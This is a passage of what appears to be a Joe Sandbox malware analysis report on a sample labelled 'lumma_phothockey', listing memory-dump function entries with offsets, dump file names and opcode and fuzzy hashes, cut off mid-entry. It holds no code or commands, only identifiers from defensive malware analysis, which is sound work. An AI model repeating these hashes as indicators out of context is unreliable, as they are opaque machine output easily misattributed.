Instruction Fuzzy Hash: 5A61F3B4E14209DFEB00CF99D498BAEBBB6FB4A304F10C06AD509B7254C7785985CB91

Function 0736AAF8 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12253315349ef2f3fda07382eea1f003f861fd04d213321dcb711c630657d06c
Instruction ID: 06accac34ccdee4c805fd533f80bef28d9e105650dd908b07820241cd2dfc38d
Opcode Fuzzy Hash: 12253315349ef2f3fda07382eea1f003f861fd04d213321dcb711c630657d06c
Instruction Fuzzy Hash: 1351E2B4E14209CFEB00CF99D498BAEBBBAFB4A304F10C029D509B7754C7B859858F91

Function 07288CF8 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1423e070987669ab7a84d6857d17d884c66d290dca4f7d14abf7d251a65c31dd
Instruction ID: b3dd4aeb0080b1f7e635f96a048be7cc6453b91f59b464644bbfc834dbe142d9
Opcode Fuzzy Hash: 1423e070987669ab7a84d6857d17d884c66d290dca4f7d14abf7d251a65c31dd
Instruction Fuzzy Hash: FC516234B106099FDB04EF64E468AADBBB7FFC8701F04551AE5029B364DF349946CB81

Function 07366818 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5885bbcfcacb35ff4a1c2c8f39de8a1aa6c8a5c74b4ebe20da21e2692d47101
Instruction ID: 86842bdb811d7c70994086a49ee44337ad62b0aae756dee2646dedb989cb5f56
Opcode Fuzzy Hash: b5885bbcfcacb35ff4a1c2c8f39de8a1aa6c8a5c74b4ebe20da21e2692d47101
Instruction Fuzzy Hash: F25143B4A25219CFEB20CF29D849BA9BBF5FB46340F2091AAC00EA7245DB745985CF45

Function 07280768 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08953502ff967ea6f1b122eaa51a20fdf71c5c4e22b305066a18a445662e9c88
Instruction ID: f62791fd1377f70bfca109d4a9d3dd4a7cfaf71725836ad0d60402d24b6a5f03
Opcode Fuzzy Hash: 08953502ff967ea6f1b122eaa51a20fdf71c5c4e22b305066a18a445662e9c88
Instruction Fuzzy Hash: 80416FB4B21306DFEB24EB65D854F6AB7B2EF88714F148429D8059B380DB76E845CF90

Function 0728E2A0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46aab8158ab54aad1a6915f9ab3de3772fe6d6da31ef02de3833cc82387bb455
Instruction ID: 82a672f318d494c8fe2fc614ebc2f6ce739c6692d91228dcd78c3b77d12b4da7
Opcode Fuzzy Hash: 46aab8158ab54aad1a6915f9ab3de3772fe6d6da31ef02de3833cc82387bb455
Instruction Fuzzy Hash: 4041BF75A512199FCB05EFA4DC54BEEBBB6FF89310F148066E401BB2A1CB319D11CBA0

Function 0736A4A8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a82098fbc909a85893fb05ae2b875e0066778977cbb9553228e02660ec8751
Instruction ID: 0e28b5ed91fc67d1e83b3f284832152506dd9aaf9885ef3456f45555937ee01e
Opcode Fuzzy Hash: 48a82098fbc909a85893fb05ae2b875e0066778977cbb9553228e02660ec8751
Instruction Fuzzy Hash: 9D4104B0E15209DFEB00CF99D948BEEBBF6FB49301F10C069E509B7648D7B95A448B91

Function 073663B9 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd7d4df0f04661d139ed4843ee84d687dbe7b5b5efbee9ed56237f3466293ba6
Instruction ID: 38f96a922903ad516877267da8b568b3691632beb54fa65fbbe7547c1ba3be2a
Opcode Fuzzy Hash: cd7d4df0f04661d139ed4843ee84d687dbe7b5b5efbee9ed56237f3466293ba6
Instruction Fuzzy Hash: 4D418BB1E00209DFDF05DFA5E8456FEBBB6FF89210F1480AAE409A7260DA359951CF91

Function 0736A4B8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0568261c35911a331a51cc653b238680262f955d6ec5135130593f8d397f7349
Instruction ID: b52908ba545c8536bc0f9689f31d0d7b37b09c017664ec938c407a4690631a3c
Opcode Fuzzy Hash: 0568261c35911a331a51cc653b238680262f955d6ec5135130593f8d397f7349
Instruction Fuzzy Hash: C441E6B0E15209DBEB04CF99D548BEEBBF6FB49301F10C069D609B7648D7B459448F91

Function 0728B8D0 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0491c7a221fdb18ab300be1bcd07e8a1c4af6fa9589707ffeaf9360a1bee8b11
Instruction ID: 923845b8971afb76651578cbdd1eaff6713aaad301f57a4614d93822ebb25317
Opcode Fuzzy Hash: 0491c7a221fdb18ab300be1bcd07e8a1c4af6fa9589707ffeaf9360a1bee8b11
Instruction Fuzzy Hash: C831E5766111059FCB45DF58D898EA9BBB2FF48321B0640A8E5099F372C731ED55DF40

Function 072808F8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 811146f92e4aed1ac39ec0e55e9e182f0c208bb35fb5f3383682d3b9851da705
Instruction ID: 56862b34e270b32f25675bd6f148b9d2af132a488733c2036edce676798bd490
Opcode Fuzzy Hash: 811146f92e4aed1ac39ec0e55e9e182f0c208bb35fb5f3383682d3b9851da705
Instruction Fuzzy Hash: 5641D1B1A1121ACFDB60EF65C955AAEBBF0FF48700F00842AD465E7290D731DE49CB90

Function 072812B1 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9df50b9d6c327a3b2e34c7eecb1b4db06deae36729bff8be7e4a4c5806da8e9
Instruction ID: ffb96143ae1661b59471bc28316f16766aa7ee702f08fb4712f71711ffb98e55
Opcode Fuzzy Hash: e9df50b9d6c327a3b2e34c7eecb1b4db06deae36729bff8be7e4a4c5806da8e9
Instruction Fuzzy Hash: B7410574A12228CFEB64EB24C891F99B7B1FF49710F1001D9E909AB3D0D632AD82CF50

Function 07289A98 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059798d620d61ed9e4edf145ee08fe344d0873802201f613fea337d9141d4506
Instruction ID: 6aa72406802979f0401691cd20c4769be6495893e915ab7bd682400de6ab4919
Opcode Fuzzy Hash: 059798d620d61ed9e4edf145ee08fe344d0873802201f613fea337d9141d4506
Instruction Fuzzy Hash: D52106723053118FD7609A69E440AA6BBE9EFC1321719847BD18DCB282CB31FC81C7A1

Function 07285550 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f77fbd1e7098d2e88d6179bbebf07f33392b8e1143e2e4cb7fad45aa0bc25ac
Instruction ID: 1ddbcdb0f7987a9d4fdec5be5d8e3aad53cd8bc02a7f712a735b1fd9c726e0eb
Opcode Fuzzy Hash: 7f77fbd1e7098d2e88d6179bbebf07f33392b8e1143e2e4cb7fad45aa0bc25ac
Instruction Fuzzy Hash: 02319E71310216DFDB25DF26D884AAA7BA6FF48315F148169F8058B2A1C735EC95CF90

Function 0724B410 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9be4d740ceadf6573544da505a8741ca23a9d68eea1ebc323fd73fe4c0ee2d
Instruction ID: 87e785fe06c8cb8b60a4e6446e41f41be37ac41982b60320fadec17e98fb33cc
Opcode Fuzzy Hash: 7b9be4d740ceadf6573544da505a8741ca23a9d68eea1ebc323fd73fe4c0ee2d
Instruction Fuzzy Hash: 873124B0E24209DFDB08CFA9D854BEEBBB6FB89310F108429D519B7250D7B59A44CF91

Function 0724B5E8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9646f3747acd4411190083597dc5f3c32bd010aaf6a3b409ce6444ce1ee28f23
Instruction ID: 1130f9d93a911d30d484d0a4a0c5953399a3a60f321ef90020cda38ac803d9cc
Opcode Fuzzy Hash: 9646f3747acd4411190083597dc5f3c32bd010aaf6a3b409ce6444ce1ee28f23
Instruction Fuzzy Hash: 793114B4E2020AEFDB08DFAAD8447EDBBB1BB89300F009129D419B7250D7749901CF90

Function 07368DC3 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e2ade6f65278852a1996bc9e2d3437ca472f2252c588e65de0c989dfca804bf
Instruction ID: c080802c86344db2a2cb92971d3de51611c9d782a22801195f170cca4d7fc59e
Opcode Fuzzy Hash: 5e2ade6f65278852a1996bc9e2d3437ca472f2252c588e65de0c989dfca804bf
Instruction Fuzzy Hash: F53135F8A09209CFEB10CF69D8487EDBBB6BB4A304F208469D00DA7659D7B95881CF41

Function 07366461 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb2f5b5d91667b5bb8923fc1e334cbe42630b5effc6418ea38482f018d2ab716
Instruction ID: c8ef64f1246387235a84eff5332e0797bb546ea1455d1eefc6a5c7b29bd2eb3f
Opcode Fuzzy Hash: bb2f5b5d91667b5bb8923fc1e334cbe42630b5effc6418ea38482f018d2ab716
Instruction Fuzzy Hash: 1A313671E002089FDB05DFA5D851AEEBBB2FF89310F14806AE51AAB264DB315941CF91

Function 072859D0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9487dbff25ab469adf77aa233e564938984f3015c32600931f107cb1f1a88c
Instruction ID: 583760dbdb080a95cd2330ed73ad20eb942e6e76e1315a5465c46a1c7537f1c2
Opcode Fuzzy Hash: cd9487dbff25ab469adf77aa233e564938984f3015c32600931f107cb1f1a88c
Instruction Fuzzy Hash: F021C1B2A14218EFC719DF95D88099EBBF9FF88310F10416AE506DB250EA34AC45CFA1

Function 0736FDB0 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3226a360a735ffb0d0230ca2ff83f262429e83eddfce42d129f392b1fe402629
Instruction ID: effa4678c85b84ed421432346d55fb5e0aa2a853da10b024560a2adb175206b9
Opcode Fuzzy Hash: 3226a360a735ffb0d0230ca2ff83f262429e83eddfce42d129f392b1fe402629
Instruction Fuzzy Hash: 59313CB5E0420ACFEB04CF99E448AEEBBF9FB89310F108026D519B3248D7746945CF91

Function 0728F080 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51d6092577262c75495cde5dda4a38b40be9a2499996d390633f1c5a6125434c
Instruction ID: 470a0b92da6c462bf1db585b854117185b866c1e33e3694d130653e07d291977
Opcode Fuzzy Hash: 51d6092577262c75495cde5dda4a38b40be9a2499996d390633f1c5a6125434c
Instruction Fuzzy Hash: AC218570F20609CFCB40FF68D5449AEB7B6FF89700B50412AD506A7364EB34AA46CB92

Function 0728B8C0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c443b679e49d3015529455a691b94a4f6580538090390e6867f9f0f3833646d0
Instruction ID: def11a6838bc495dad32acee2878a95c09498631ec86d8bcffd6284ee70a2870
Opcode Fuzzy Hash: c443b679e49d3015529455a691b94a4f6580538090390e6867f9f0f3833646d0
Instruction Fuzzy Hash: 81214C76A111059FCB05DF94E858D99BBB2FF49320B0640A9F6099F372C731DD15DB40

Function 0724CA20 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eba2bfafd713855241c4c8db60f895701f3ed0b15434edb17fdcb7f9a7caade
Instruction ID: 84e9b64bceddc49a0c268b28a1558da684971625e3ffe3c980ff60b8869528b5
Opcode Fuzzy Hash: 0eba2bfafd713855241c4c8db60f895701f3ed0b15434edb17fdcb7f9a7caade
Instruction Fuzzy Hash: 44318CB4E26209DFDB04DF99D4587EEBBF6FB8A300F108068D419A7340C7785A818FA1

Function 07282D80 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c8ed1cfab4e6bc12d714f9e91f29208a04604450f85606ab9d16c853db35976
Instruction ID: dd7a6245f08d0e3b4911d26be808bc7cb925549c1a054d1f76a2a5df6f5512e5
Opcode Fuzzy Hash: 8c8ed1cfab4e6bc12d714f9e91f29208a04604450f85606ab9d16c853db35976
Instruction Fuzzy Hash: 4F2148B2A2125ADFDB90EAB8C504BEEBBF4BB08340F508066D515D7290E735DA50CB91

Function 02CDD3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1551533753.0000000002CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cdd000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 425eaee9fc2463bb663e3a0a4895039bcd62fd3f685941db8cac5b1db7332918
Instruction ID: 46066d55aa088726ed92228510afa22c4b129987bcd26af5af0ecbec54fdb081
Opcode Fuzzy Hash: 425eaee9fc2463bb663e3a0a4895039bcd62fd3f685941db8cac5b1db7332918
Instruction Fuzzy Hash: F921D372904204EFDB19EF54D9C0B26BB65FB94324F24C569EA0A0B256C336F456CAA2

Function 07288028 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6908252fb44f4ddf2b787e7c64977ac1939965522f5e5a3f27b83c938fb65ab5
Instruction ID: 24efbea91065824ef77327520b6b84be8c9f7298bec751a7ba17d6f1bef6aefa
Opcode Fuzzy Hash: 6908252fb44f4ddf2b787e7c64977ac1939965522f5e5a3f27b83c938fb65ab5
Instruction Fuzzy Hash: 2521F271910616DFCB01EF58C8809AAFBB9FF84300F45C169D5159B286C332F8A6CBD2

Function 0728F071 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7247136911a3f9883b686f2b75121835bc6f53850a7fad3033f73f403a687606
Instruction ID: fd02c91febc47e0b85b13f8b25a64dcbcf4f3c371039322ad148be62fa709ac5
Opcode Fuzzy Hash: 7247136911a3f9883b686f2b75121835bc6f53850a7fad3033f73f403a687606
Instruction Fuzzy Hash: 1A21DA74B21609CFCB40FF64C9409EEBBB5EF8A300F50415AD501973A0DB35AA46CBE2

Function 072A3C58 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9999571aeff62f9fc64e4a4c6fb36006c8034af628f77912a23ceb7b327c61a2
Instruction ID: 3f31455d912a8941041f82726a61a910db4ffc3d681c76446c7e777c00da15f5
Opcode Fuzzy Hash: 9999571aeff62f9fc64e4a4c6fb36006c8034af628f77912a23ceb7b327c61a2
Instruction Fuzzy Hash: E521C97291428AEFCB01DB74D4642EDBF71EF46310F2849DAC49557603D7315A52DB81

Function 02CED030 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1551562892.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ced000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 070949f1de4de4635a5429cbefec6b638790b7da73ed4588d9d52be61519954a
Instruction ID: 0a9be4033a674be1072f8f8dbd27722e95c4e322d29185f745735c7ee907948e
Opcode Fuzzy Hash: 070949f1de4de4635a5429cbefec6b638790b7da73ed4588d9d52be61519954a
Instruction Fuzzy Hash: 9721D076604244DFDF14DF14D9C4B26BB69EBC8324F28C569E80B0B246C336D90BCAA2

Function 02CED005 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1551562892.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ced000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd34bf2c626719acca1abf2d5620d26c90680390aada03e024686e315054db3c
Instruction ID: 3c63b7626a16315c3673e460b91d81f7dcceb7d467c8f930cb8b0a40fcd30818
Opcode Fuzzy Hash: fd34bf2c626719acca1abf2d5620d26c90680390aada03e024686e315054db3c
Instruction Fuzzy Hash: 0521717550D3C08FCB03CF24D990755BF71AB86214F1981EBD8858F5A7C33A991ACBA2

Function 07286F38 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb403cc75b740d543e9ce57d9944d1f7a31dd59454e70416148220b4df30a1d
Instruction ID: 7453c20147f114ecacbd30f64ad6ae0b89e78f2ff35265277fff1beacf143d02
Opcode Fuzzy Hash: adb403cc75b740d543e9ce57d9944d1f7a31dd59454e70416148220b4df30a1d
Instruction Fuzzy Hash: 06212371A10219CFDB14EF94D944ADDB7F2FB88311F2041A8E405BB2A1CB76AD85CBA0

Function 072A4958 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49fee888b57968c023b7383134cb387eb089279d3cf4b8b61a2c1c371a04573
Instruction ID: 4733264a98d4efc21ce3d8e792abbc48d7bfdfaed413a6d56ddfa441470f31ad
Opcode Fuzzy Hash: d49fee888b57968c023b7383134cb387eb089279d3cf4b8b61a2c1c371a04573
Instruction Fuzzy Hash: CC2103B1C14289EFCB00DFA8C441BECBBB4EF05310F2081DAC81997291C6728A02DB82

Function 072A5D68 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a57d73c9b990614a964baf1920954c2248a34313a50c8dd63008c16311e6d97
Instruction ID: 54c0e5b44502fc36599440ee6de0ec47ed00d93d618ed6af2649c2dd5e52146e
Opcode Fuzzy Hash: 6a57d73c9b990614a964baf1920954c2248a34313a50c8dd63008c16311e6d97
Instruction Fuzzy Hash: D8213AF4D25609EBDB04CFAAD4482EFBBF6FB89300F10802AD115B3240DBB41A54CBA1

Function 072A5D58 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9471746acdf2a57ee2fbd543ccedf10d96f449fe4732e3df6ab921298f01bc6
Instruction ID: e96dae737a4b019e4fe8c8b5a5273aaceb447133ff7e359b8cd01e0325ccd8e2
Opcode Fuzzy Hash: e9471746acdf2a57ee2fbd543ccedf10d96f449fe4732e3df6ab921298f01bc6
Instruction Fuzzy Hash: 09212AF4D25609EFDB04CFAAD5493EEBBB6FB89311F10842AD115B3240DBB81A54CB91

Function 072AF2F8 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6910f422a76ecad896170132d5a49b6d84b255e0576cdc0eb574f982c65c7358
Instruction ID: 7e23eb1b93051bd879566d2592f49caa05e6efa939e9703c9d58a284b9989011
Opcode Fuzzy Hash: 6910f422a76ecad896170132d5a49b6d84b255e0576cdc0eb574f982c65c7358
Instruction Fuzzy Hash: 80210CB4E2524AEFCB14DFA9D1456AEBBB6FB49300F1481A9D805A7240D7389941CF91

Function 072808E8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df9b248f0e89f489401bc1ea39daf2896843f1b21cda4935237f9e9fe6bc5ec
Instruction ID: 1144082d06e7d7428f1da70caf1ac7a2b262ee335ec4c281881333752581af22
Opcode Fuzzy Hash: 3df9b248f0e89f489401bc1ea39daf2896843f1b21cda4935237f9e9fe6bc5ec
Instruction Fuzzy Hash: 0121E1B5712616CFDB20EF64D864A6EB7F1FF88614F00442AC922973A5D731ED49CBA0

Function 072A4620 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a1398058321d7a47ce978b50cb8de48e765c3230c6817fd3b26de9950bfb4d
Instruction ID: 818a6fa5a075a00c0af25e6727213b996a9c6dceef2d92a59bc3aa710688eda5
Opcode Fuzzy Hash: e4a1398058321d7a47ce978b50cb8de48e765c3230c6817fd3b26de9950bfb4d
Instruction Fuzzy Hash: CB217FF0E29189EBCB08EF6DD4846AEBBF2FF85700F1085A9C404A7294D7B999448B40

Function 072A4630 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5a20a29a55b0177224a44abed65ecd62066846a66ec29a4ad937314017f40cb
Instruction ID: 8857f36fb2d61765921d313098521504325294fea30c545cc8ce0feefd28259d
Opcode Fuzzy Hash: f5a20a29a55b0177224a44abed65ecd62066846a66ec29a4ad937314017f40cb
Instruction Fuzzy Hash: 571121F0E25149EBDB08EFADD4556AEBBF6FF89700F5084A9C405E7244E7B499448B40

Function 0736E6D0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
